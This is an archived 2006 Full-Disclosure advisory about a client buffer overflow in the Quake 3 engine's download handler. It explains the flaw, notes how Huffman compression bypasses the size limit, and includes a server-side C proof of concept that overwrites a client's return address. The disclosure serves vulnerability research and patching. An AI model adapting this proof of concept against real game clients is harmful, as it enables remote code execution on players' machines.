Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] Client buffer-overflow in Quake 3 engine (1.32c / rev

from [Luigi Auriemma] Network Security [Permanent Link]
Subject: [Full-disclosure] Client buffer-overflow in Quake 3 engine (1.32c / rev 795)
Date: Fri, 2 Jun 2006 18:46:03 +0200 

#######################################################################

                             Luigi Auriemma

Application:  Quake 3 engine
              http://www.idsoftware.com
              http://www.icculus.org/quake3/
Versions:     Quake 3               <= 1.32c
              Icculus.org Quake 3   <= revision 795
              other derived projects
Games:        exist many games which use the Quake 3 engine and
              probably they are all vulnerable but I'm not able and
              have no time to test them.
              An enough complete list of these games is available here:
                http://en.wikipedia.org/wiki/Quake_III_engine#Uses_of_the_engine
Platforms:    Windows, *nix, *BSD, Mac and others
Bug:          buffer-overflow in CL_ParseDownload
Exploitation: remote, versus client
Date:         02 Jun 2006
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


The Quake 3 engine is the famous game engine developed by id Software
(http://www.idsoftware.com) in the far 1999 but is still one of the
most used, licensed and played engines.
It has been released open source under the GPL license some months ago
and now it's mainly maintained by Icculus
(http://www.icculus.org/quake3/) although exist many other derived
projects.


#######################################################################

======
2) Bug
======


The CL_ParseDownload function located in code/client/cl_parse.c is used
by the clients for handling the download commands (svc_download)
received from the server.

The function uses a signed 16 bit number sent by the server for copying
raw data from the network to the data buffer of 16384 (MAX_MSGLEN)
bytes:

void CL_ParseDownload ( msg_t *msg ) {
    int     size;
    unsigned char data[MAX_MSGLEN];
    ...
    size = MSG_ReadShort ( msg );
    if (size > 0)
        MSG_ReadData( msg, data, size );
    ...

Some interesting details:
The (reassembled) packets handled by Quake 3 can be max 16384 bytes but
is possible to bypass this limit through the huffman compression used
automatically and trasparently in the engine (thanx to Thilo Schulz).
In short for exploiting this bug is enough to use 16384 NULL (0x00)
bytes, which occupy a very small amount of space, followed by the
usual "stuff" (return address to overwrite and shellcode).
The data copied with the MSG_ReadData is raw so there are no bad bytes
to avoid for the exploitation.
Note that the svc_download can be sent to the client in any moment so
the client can be attacked also immediately after the ending of the
connect handshake (just the first server's message).


#######################################################################

===========
3) The Code
===========


The server must be modified for sending the malformed svc_download
command and is possible to use the following instructions which
demonstrate how to overwrite the return address with 0x61616161.
It's enough to place them in code/server/sv_client.c just after the
"// send the gamestate" comment at about line 575:

    // send the gamestate
    int     i;
    MSG_WriteByte( &msg, svc_download );
    MSG_WriteShort( &msg, -1 );         // block != 0, for fast return
    MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy
    for(i = 0; i < 16384; i++) {        // overwrite the data buffer
        MSG_WriteByte(&msg, 0x00);      // 0x00 for saving space
    }
    for(i = 0; i < 32; i++) {           // do the rest of the job
        MSG_WriteByte(&msg, 'a');       // return address: 0x61616161
    }
    SV_SendMessageToClient( &msg, client );
    return;


#######################################################################

======
4) Fix
======


Icculus will fix the code soon.
I have tried to contact id Software too but it's only time lost...
The developers of the other derived projects and games have not been
contacted (almost all the games are no longer supported and it's a bit
long for me to find and contact each single developer of the other
open source projects).


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] Client buffer-overflow in Quake 3 engine (1.32c / rev 795), Luigi Auriemma <=
Previous by Date:  Re: New Snort Bypass - Patch - Bypass of Patch, M. Dodge Mumford
Previous by Thread:  # MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit, erne ayaz
Indexes:  [Date] [Thread] [Top] [All Lists]